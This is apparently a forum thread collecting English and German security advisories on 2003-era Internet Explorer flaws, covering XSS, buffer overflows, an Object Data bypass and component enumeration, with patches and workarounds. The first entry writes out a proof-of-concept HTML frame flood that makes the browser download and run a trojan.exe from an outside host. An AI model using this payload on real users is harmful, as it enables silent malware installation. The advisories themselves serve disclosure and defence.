[Security Holes] Internet Explorer

#1 By flooding the Internet Explorer with multiple FRAME tags it is possible
to cause it to not only download a file, but also execute it (even though
the default security settings prohibits it). The vulnerability is
processor related, meaning that the amount of CPU time available for
processing determines whether the vulnerability occurs or not.

DETAILS

Vulnerable systems:
* Internet Explorer version 6.0.2800

Example:
If you create such a malicious HTML file:

< FRAME SRC="C:\winnt\welcome.exe"></FRAME>
< FRAME SRC="C:\winnt\notepad.exe"></FRAME>
< FRAME SRC="C:\winnt\regedit.exe"></FRAME>
.. Together around 191 ... and after comes our Trojan ...
< FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
< FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
< FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
< FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
< FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>

An unsuspecting user that opens it, will unwillingly not only download but
also execute the trojan.exe file.

Demonstration:
A demonstration site has been constructed:
<http://www.malware.com/forceframe.html>
http://www.malware.com/forceframe.html (Outside out web site)

We recommend you download the HTML file, and construct your own sample.


ADDITIONAL INFORMATION

The information has been provided by <mailto:mb@systemintegra.com> Marek
Bialoglowy.
__________
powered by http://different-thinking.de - Netze, Protokolle, Sicherheit, ...

#2 Cross Site Scripting (XSS)

Datum : 04.06.2003

Vulnerability : Microsoft Internet Explorer 5.01, 5.5 und 6.0

Patch : http://lists.netsys.com/pipermail/full-disclosure/2003-June/009999.html

http://lists.netsys.com/pipermail/full-disclosure/2003-June/009999.html

Der Microsoft Internet Explorer ist mit seiner Verbreitung von schätzungsweise 95 % der mitunter populärste Webbrowser der aktuellen Stunde. Seine hohe Verbreitung ist unter anderem darauf zurückzuführen, dass er ein fester Bestandteil moderner Windows-Betriebssysteme ist. Der Microsoft Internet Explorer ist in der Lage, verschiedene Protokolle - z.B. HTTP und FTP - zu interpretieren. Die FTP-Implementierung bietet zwei mögliche Ansichtstypen: Bei der "Folder View" werden die Verzeichnisse und Dateien als Icons dargestellt; bei der "Classic View" werden die Dokumente als Textlinks gezeigt. Bei der klassischen Ansicht kann ein Cross Site Scripting Angriff durchgeführt werden, da der Hostname des zugegriffenen FTP-Servers als HTML interpretiert und dargestellt wird. Ein Angreifer kann so Scripte und Zugriffe im Sicherheitskontext des Servers ausführen lassen. Laut dem Posting auf der Security-Mailingliste Full-Disclosure wurde Microsoft im Januar 2003 über das Problem informiert, jedoch hätten sie selbst vier Monate später in keinster Weise darauf reagiert. So wird im Posting wenigstens ein Workaround aufgezeigt: Wie schon bei der vor rund einem halben Jahr bekannt gewordenen Gopher-Attacke auf den Internet Explorer wird das Angeben eines fiktiven und nicht-existenten Proxies für FTP-Verbindungen empfohlen.

Cross Site Scripting Angriffe wie dieser werden gerne unterschätzt. Richtig angewendet können sie jedoch beachtlichen Schaden für die Betroffenen darstellen. Dieser spezifische Angriff hier ist auf einen Fehler in einer Software zurückzuführen; das ist bei einer Cross Site Scripting Verwundbarkeit eher selten gesehen. Zudem ist für die erfolgreiche Umsetzung dieses Angriffs zwingend die "Classic View" erforderlich. Trotzdem sollte man sich des Risikos bewusst sein und falls möglich den im Advisory genannten Workaround anwenden. Obschon diese Angriffsform eher weniger populär werden wird.

quelle scip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#3 Pufferüberlauf

Datum : 04.06.2003

Vulnerability : Microsoft Internet Explorer 5.01, 5.5 und 6.0

Patch : http://www.microsoft.com/technet/security/bulletin/MS03-020.asp

http://www.microsoft.com/technet/security/bulletin/MS03-020.asp

Der Microsoft Internet Explorer ist mit seiner Verbreitung von schätzungsweise 95 % der mitunter populärste Webbrowser der aktuellen Stunde. Seine hohe Verbreitung ist unter anderem darauf zurückzuführen, dass er ein fester Bestandteil moderner Windows-Betriebssysteme ist. Durch eine Sicherheitslücke im beliebten Webbrowser ist es einem Angreifer möglich, beliebigen Programmcode mit den Rechten des Benutzers ausführen zu lassen. Dazu wird ein Pufferüberlauf bei der Interpretierung des object-Tags ausgenutzt, wie im entsprechenden Bugtraq-Posting aufgezeigt wird. Dieser Tag wird von Webdesignern herangezogen, um ActiveX-Komponenten in HTML-Dokumenten einzufügen. Die Attacke lässt sich über sämtliche Programme ausführen, die auf die Internet Explorer-Komponente zurückgreifen (z.B. Auch Outlook). Microsoft berichtet, dass ihr Internet Explorer auf dem Windows 2003 Server standardmässig mit einer optimierten Sicherheitskonfiguration ausgeliefert wird. Der Angriff ist sodann nicht möglich, sofern keine Änderungen an den Einstellungen (z.B. Interpretierung von ActiveX-Elementen) vorgenommen wurden. Microsoft hat einen kumulativen Patch veröffentlicht, der die Sicherheitslücke beseitigt. Neben der beschriebenen Schwachstelle behebt er eine weitere, bereits bekannte Verwundbarkeit. Der Patch kann seit heute morgen (ca. 9:30 Uhr) über das Windows Update bezogen werden.

Diese Sicherheitslücke birgt ein hohes Risiko in sich. So ist ein entfernter Angreifer mit einem simplen HTML-Code in der Lage, den Webbrowser abstürzen oder beliebigen Programmcode ausführen zu lassen. Da ein Beispiel-Exploit für einen Denial of Service-Angriff im Bugtraq-Posting enthalten war, ist es nur eine Frage der Zeit, bis dieser Angriff erfolgreich im World Wide Web angetroffen werden kann. Vor allem Skript-Kiddies und Anbieter von Dialern werden diese Methode für ihre Zwecke nutzen wollen. Es ist kein Geheimnis, dass ActiveX nicht unbedingt den besten Ruf in Bezug auf die Sicherheit geniesst. So sollte man bei Nichtgebrauch auf die Interpretation dessen verzichten. Zudem gilt es den durch Microsoft freigegebenen Patch zu installieren.

quelle : scip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#4 Datum : 17.06.2003

Vulnerability : Microsoft Internet Explorer 5.5 und 6.0; sämtliche Tools mit der Internet Explorer Engine (z.B. AOL Browser und MSN Explorer)

Patch : http://www.microsoft.com

http://sec.greymagic.com/adv/gm013-ie/

Der Microsoft Internet Explorer ist mit seiner Verbreitung von schätzungsweise 95 % der mitunter populärste Webbrowser der aktuellen Stunde. Seine hohe Verbreitung ist unter anderem darauf zurückzuführen, dass er ein fester Bestandteil moderner Windows-Betriebssysteme ist. Der Webbrowser ist in der Lage, XML-Dateien individuell zu interpretieren. Unter gewissen Umständen ist es einem Angreifer jedoch möglich, dadurch eine Cross Site Scripting Attacke durchzuführen. Um die Lücke auszunutzen, benötigt der Angreifer einen Webserver mit einer fehlerhaften XML-Datei. Zusätzlich muss er den Benutzer dazu bringen, auf einen speziell vorbereiteten Link zu klicken. Durch das Aufrufen der im Advisory angegebenen URL können Sie überprüfen, ob Ihr Webbrowser verwundbar ist. Wie im Advisory beschrieben ist, wird die Schwachstelle im MSXML vermutet, und nicht im Webbrowser selbst. Es ist damit zu rechnen, dass sobald die Schwachstelle näher untersucht worden ist, mit einem Patch reagiert werden wird.

Cross Site Scripting Angriffe erfreuen sich in letzter Zeit grosser Beliebtheit. Viele tun sie als kleines Ärgernis ab - Andere schätzen sie als reelle Bedrogung ein. Gerade bei Angriffen wie diesem, bei dem eine Vielzahl von Benutzern gefährdet sind, muss man das Risiko als gegeben akzeptieren. Es scheint, als sei diese Schwachstelle publiziert worden, bevor der Hersteller informiert wurde. Dies schafft ein Zeitfenster für mögliche Angriffe, denen schlussendlich die Benutzer ausgesetzt sind. GreyMagic Software hat mit ihrem Advisory inkl. Beispiel-Exploit also nicht sehr kompetent reagiert - Schade.

quelle scip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#5 Datum : 17.06.2003

Vulnerability : Microsoft Internet Explorer 5.01, 5.5 und 6.0; sämtliche Tools mit der Internet Explorer Engine (z.B. AOL Browser und MSN Explorer)

Patch : http://www.microsoft.com

http://sec.greymagic.com/adv/gm014-ie/

Der Microsoft Internet Explorer ist mit seiner Verbreitung von schätzungsweise 95 % der mitunter populärste Webbrowser der aktuellen Stunde. Seine hohe Verbreitung ist unter anderem darauf zurückzuführen, dass er ein fester Bestandteil moderner Windows-Betriebssysteme ist. Der Internet Explorer greift standardmässig auf lokal abgespeicherte HTML-Dokumente zurück, um Fehlermeldugnen (z.B. "404 Not Found") zu ersetzen und sie in einem handlichen Format darzustellen. Diese Ausgaben werden als "Friendly HTTP error messages" bezeichnet und können in den Einstellungen der Software deaktiviert werden. Wird zum Beispiel die Seite http://www.scip.ch/nonexistent.html aufgerufen, zeigt der Webbrowser die Datei res://shdoclc.dll/404_HTTP.htm#http://www.scip.ch/nonexistent.html. Der Teil nach dem #-Zeichen (also die fehlerhafte URL) wird extrahiert und als Teil der Fehlermeldung verwendet. Dieser Umstand ermöglicht das Einschleusen und Umsetzen von Cross Site Scripting. Microsoft wurde am 20. Februar 2003 über dieses Problem informiert. Es wird an einem Patch gearbeitet. Sehr wahrscheinlich wird das Problem im nächsten Service Pack behoben werden.

Dieser Monat scheint jener der Cross Site Scripting (XSS) Schwachstellen zu sein. Entsprechend werden die Diskussionen angeregt, welche Gefahr effektiv von dieser Angriffsform ausgehen kann.

quelle scip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#6 Datum : 02.09.2003

Vulnerability : Microsoft Internet Explorer

Patch : http://lists.netsys.com/pipermail/full-disclosure/2003-September/009445.h
tml

Exploit : http://lists.netsys.com/pipermail/full-disclosure/2003-September/009506.h
tml

http://www.scip.ch

Der Microsoft Internet Explorer ist mit seiner Verbreitung von schätzungsweise 95 % der mitunter populärste Webbrowser der aktuellen Stunde. Marc Ruef postete am 02. September 2003 auf Full-Disclosure den Hinweis, dass sein Internet Explorer 6.0 unter Windows XP Professional beim Aufsuchen einer bestimmten Webseite abstürzen würde. Es konnte zu Beginn nicht genau ausgemacht werden, was den Fehler versuchsacht. Zuerst wurde dieser im HTML-Quelltext vermutet, bis sich jedoch allmälich herausstellte, dass ein Bild dafür verantwortlich war. Durch das Aufrufen eines manipulierten GIF-Bildes kann im Internet Explorer ein Pufferüberlauf erzeugt werden. Inwiefern sich damit Programmcode ausführen lässt, ist noch unklar. Microsoft wurde einen Tag nach dem Posting per Email über das Problem informiert. Es ist abzuwarten, wie reagiert werden wird. Der einzige Workaround besteht im Deaktivieren des Anzeigens von Bildern. Dies kann über die Funktion Tools/Internet Options/Advanced/Show pictures umgesetzt werden.
Anfangs war es nicht ganz sicher, ob hier nicht ein altbekannter Fehler in der Bibliothek mshtml.dll vorliegt. Die regen Diskussionen auf der Mailingliste offenbarte jedoch, dass es sich hier um eine ernstzunehmende Sicherheitslücke in der Abarbeitung von GIF-Dateien handeln muss. Die Schwachstelle wurde noch nicht definitiv bestätigt. Aufgrund der Schwerde der Lücke ist zu erwarten, dass Microsoft so schnell wie möglich reagieren wird.

quelle : scrip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#7 Datum : 07.09.2003

Vulnerability : Microsoft Internet Explorer 5.01, 5.5, 6.0 und 6.0

Patch : http://www.microsoft.com/technet/treeview/default.asp?url=/technet/securi
ty/bulletin/MS03-032.asp

Expoit : http://lists.netsys.com/pipermail/full-disclosure/2003-September/009639.h
tml

1@malware.com, http://www.malware.com

Der Microsoft Internet Explorer ist mit seiner Verbreitung von schätzungsweise 95 % der mitunter populärste Webbrowser der aktuellen Stunde. http-equiv@excite.com meldet auf der Sicherheits-Mailingliste Full-Disclosure, dass der von Microsoft veröffentlichte Patch Q822925 zum Schließen der Object Data Sicherheitslücke des Internet Explorers nicht funktioniert. Der Internet Explorer bestimmt anhand der Endung des Parameters des Object Data Tags, ob ein Objekt sicher ist. Allerdings gibt der Content-Type im Header einer HTTP-Anfrage tatsächlich vor, wie die Behandlung aussehen soll. Durch das Sicherheitsloch ist es möglich, ausführbare Dateien wie etwa HTML-Applikationen (.hta) ohne Rückfragen im Kontext des Anwenders auszuführen. In gewisser Weise ähnelt diese Schwachstelle sehr stark der in MS01-20 beschriebenen, die bereits Würmer wie Nimda und Klez ausgenutzt haben. Ein proof-of-concept Exploit ist im Advisory enthalten. Von der Schwachstelle betroffen sind 5.01, 5.5 und 6.0. Es gibt schon Dialer und Erotik-Webseiten, die sich diese Schwachstelle zunutze machen. Als Workaround wird das Deaktivieren von Active Scripting über Tools/Internetoptionen/Sicherheit/Stufe anpassen/Active Scripting empfohlen.
Der fehlerhafte Patch war bereits der zweite Versuch, dieses Sicherheitsloch zu schliessen. Es ist also äusserst peinlich, wie Microsoft diese Schwachstelle behandelt. Vor allem fragwürdig sind die Geschehnisse, wenn man sich die Schwere der Lochs vor Augen führt. Vor allem Anbieter von zweifelhaften Inhalten im World Wide Web (z.B. Porno-Seiten) werden die Möglichkeiten für ihre Zwecke einsetzen (z.B. Installieren von Dialern). Es sind aber auch Würmer, die auf HTML-Mails basieren, denkbar. Davon wurden schon die ersten gesichtet. Deaktivieren Sie Active Scripting, um gegen diesen Angriff nicht mehr verwundbar zu sein.

http://www.tecchannel.de/sicherheit/reports/833.html

quelle : scip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#8 Datum : 11.09.2003

Vulnerability : Microsoft Internet Explorer 5.01, 5.5 und 6.0

Patch : http://windowsupdate.microsoft.com

Liu Die Yu, liudieyuinchina@yahoo.com.cn, http://SafeCenter.NET

Die Vielzahl an Schwachstellen, die hauptsächtlich von Liu Die Yu identifiziert und dann auf unter anderem auf Bugtraq publiziert wurden, ähneln sich stark. So ist stets eine JavaScript-Funktion mit der Möglichkeit behaftet, Informationen oder Cookies aus anderen Seiten auszulesen oder gar aktive Inhalte im Sicherheitskontext dieser anzuzeigen. Es scheint also, als sei Microsoft ein grundsätzlicher Designfehler beim Entwickeln des Sicherheitsmodells für JavaScript unterlaufen. Aus Sicherheitsgründen sollten Sie Active Scripting für sämtliche Inhalte verbieten und dann vorzu benötigte Webseiten freizuschalten. Diese Herangehensweise hat sich schon seit vielen Jahren beim Erstellen von Firewall-Regeln bewährt. Nur so können Sie auf der sicheren Seite sein.

Veröffentlichungen :
http://www.securityfocus.com/archive/1/336992
http://www.securityfocus.com/archive/1/336990
http://www.securityfocus.com/archive/1/336937
http://www.securityfocus.com/archive/1/336931
http://www.securityfocus.com/archive/1/336954
http://www.securityfocus.com/archive/1/336960

Exploits :
http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM
http://www.safecenter.net/liudieyu/NAFfileJPU/NAFfileJPU-MyPage.HTM
http://safecenter.net/liudieyu/HijackClick/HijackClick-Content.HTM
http://www.safecenter.net/liudieyu/BackMyParent2/BackMyParent2-MyPage.HTM
http://www.safecenter.net/liudieyu/NAFjpuInHistory/NAFjpuInHistory-MyPage.HTM
http://www.safecenter.net/liudieyu/WsOpenFileJPU/WsOpenFileJPU-MyPage.HTM

Links :
http://www.kryptocrew.de/home/index.php?newsid=607
http://www.tecchannel.de/sicherheit/reports/968.html
http://de.secunia.com/advisories/9711/

quelle scip && bugtraq
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de

#9 Microsoft Internet Explorer 6.0 getComponent auslesen

Datum : 10.11.2003

Vulnerability : Microsoft Internet Explorer 6.0; eventuell auch frühere Versionen

Patch : http://windowsupdate.microsoft.com

http://msdn.microsoft.com/workshop/author/behaviors/reference/methods/det
ectable.asp

Sam Schinke

Der Microsoft Internet Explorer (MS IEX) ist der am meisten verbreitete Webbrowser und fester Bestandteil moderner Windows-Betriebssysteme. Über die Funktionen getComponentVersion und isComponentInstalled kann ein Angreifer die CLSID auslesen und so die installierten Komponenten in Erfahrung bringen. Diese Information kann für weitere Zugriffe und Attacke genutzt werden. Microsoft wird diesen Fehler voraussichtlich durch einen Patch oder in einer zukünftigen Programm-Version beheben. Deaktivieren Sie Active Scripting und lassen Sie es ausschliesslich für vertrauenswürdige Sites zu.

Eine weitere Schwachstelle, die die Benutzer des verbreiteten Internet Exporers betrifft. Grundsätzlich handelt es sich um einen Designfehler, der sich jedoch mit einer sichereren Konfiguration beheben lässt. Der Angriff bringt zwar sensitive Informationen ans Tageslicht, kann jedoch nicht direkt für eine aktive Attacke genutzt werden.

quelle scip
__________
http://linux.regionnet.de/ - http://www.pf-lug.de/ - http://www.4logistic.de/ - http://www.pfenz.de